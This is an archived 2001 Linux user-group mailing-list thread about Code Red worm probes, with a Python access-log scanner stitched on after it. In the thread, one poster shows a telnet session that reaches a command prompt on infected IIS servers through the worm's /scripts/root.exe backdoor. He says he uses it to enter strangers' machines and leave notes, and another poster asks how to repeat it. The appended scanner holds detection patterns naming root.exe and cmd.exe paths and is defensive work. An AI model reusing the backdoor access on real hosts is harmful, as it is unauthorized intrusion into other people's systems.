CR worm infection attempts

Kim Allen plug-discuss@lists.PLUG.phoenix.az.us
Wed, 8 Aug 2001 15:26:05 -0700 (MST)


Been doing an nslookup and those that are found I then do a whois to find a 
valid name/address. I've tried the webmaster(root, administrator, etc)@ip 
but as you pointed out too many times it bounces. 

> How have you been notifying the sites?  
> 
> I have been keeping track of infected sites and wanted to attempt to let them
> know that they were infected, but didn't know of a good way to do it.  I thought
> about sending email to "webmaster@<ip>" but I don't want to deal with all of the
> returned email for sites that didn't have a webmaster alias setup.
> 
> Jay...
> 
> > I've been contacting the sites that my server logs show have been
> > hitting me with the code red signature and so far no one has bothered to
> > respond except for one. However that site has told me how secure they are
> > and how there is no way that they have any problems. When I sent them the
> > portions of my server logs showing they do have a problem they threatened
> > legal action. Has anyone else had this type of response?
> > 
> > > To answer your question... make sure you're hitting enter TWICE after
> > > the command.
> > >
> > > As a security guy myself, I'm deeply troubled by what I'm finding.
> > > Check it out:
> > >
> > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > > Trying xxx.xxx.xxx.xxx...
> > > Connected to xxx.xxx.xxx.xxx.
> > > Escape character is '^]'.
> > > GET /scripts/root.exe HTTP/1.0
> > >
> > > HTTP/1.1 200 OK
> > > Server: Microsoft-IIS/5.0
> > > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > > Content-Type: application/octet-stream
> > > Microsoft Windows 2000 [Version 5.00.2195]
> > > (C) Copyright 1985-1999 Microsoft Corp.
> > >
> > > c:\inetpub\scripts>
> > >
> > > From here, I've been leaving a nice text file on \\ALL USERS\\ desktops
> > > that explains how I did it, and why they need to pay attention to
> > > security patches. :)
> > >
> > > Hopefully they won't take it the 'wrong' way.
> > >
> > > ~g~
> > >
> > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > > Wayne Conrad wrote:
> > > > >
> > > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > > keep recreating the same data each time.
> > > > >
> > > > > Are you putting the IPs up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > > > >     Wayne
> > > > ________________________________________________
> > > >
> > > > I've been trying that out
> > > >
> > > > telnet ipaddress_from_my_httpd_access_log 80
> > > >
> > > > GET /scripts/root.exe HTTP/1.0
> > > >
> > > > but I can't get a command prompt - what am I missing?
> > > >
> > > > Craig
> > > > ________________________________________________
> > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > >
> > > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > >
> > >
> > 
> 
> -- 
> -----------------------------------------------------------------------------
> --- Jay Kalafus ------------------------------------- Kalafus@Kalafus.com ---
> -----------------------------------------------------------------------------
>
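The thread above works from web server access logs to build a list of hosts sending Code Red probes and then tries to notify their owners. The following is an added example, not code from any poster on this list: a log scanner that flags the request paths Code Red and its Code Red II backdoor leave behind (the /default.ida request and the /scripts/root.exe probe seen in the quoted telnet session) and aggregates them per source IP with first/last seen times, which is the data one would attach to a notification. The Apache combined log format, the sample lines and the RFC 5737 addresses are assumptions constructed for the example.

```python
import re
from datetime import datetime

# Request paths that Code Red (the /default.ida overflow) and the Code Red II
# backdoor probes (root.exe / cmd.exe) leave in a web server's access log.
CODE_RED_REQUEST = re.compile(
    r"^GET\s+(?:/default\.ida\?|/scripts/root\.exe|/MSADC/root\.exe"
    r"|/[cd]/winnt/system32/cmd\.exe)", re.IGNORECASE)
# Apache combined log format (assumed): ip ident user [ts] "request" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

def parse_line(line):
    """Return (ip, timestamp, request) for a well-formed line, else None."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("req")

def infected_hosts(lines):
    """Per source IP that sent a Code Red probe: hit count, first and last seen."""
    hosts = {}
    for line in lines:
        parsed = parse_line(line)          # malformed lines are skipped
        if parsed is None:
            continue
        ip, ts, req = parsed
        if not CODE_RED_REQUEST.match(req):  # ordinary traffic is ignored
            continue
        e = hosts.setdefault(ip, {"count": 0, "first": ts, "last": ts})
        e["count"] += 1
        e["first"], e["last"] = min(e["first"], ts), max(e["last"], ts)
    return hosts

def report(hosts):
    """One line per infected host, most active first, to attach to a notice."""
    return [f"{ip}\t{e['count']} hits\t{e['first']:%Y-%m-%d %H:%M} .. {e['last']:%Y-%m-%d %H:%M}"
            for ip, e in sorted(hosts.items(), key=lambda kv: -kv[1]["count"])]
# Constructed sample log (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [06/Aug/2001:04:22:13 -0700] "GET /default.ida?XXXXXXXX HTTP/1.0" 404 289 "-" "-"
192.0.2.10 - - [06/Aug/2001:05:10:01 -0700] "GET /scripts/root.exe HTTP/1.0" 404 289 "-" "-"
198.51.100.7 - - [06/Aug/2001:06:00:00 -0700] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.7"
198.51.100.7 - - [06/Aug/2001:06:00:05 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 289 "-" "-"
not a log line at all
"""
if __name__ == "__main__":
    print("\n".join(report(infected_hosts(SAMPLE_LOG.splitlines()))))
```

Point it at a real access log with `infected_hosts(open(path))` to get the per-host summary for your own server.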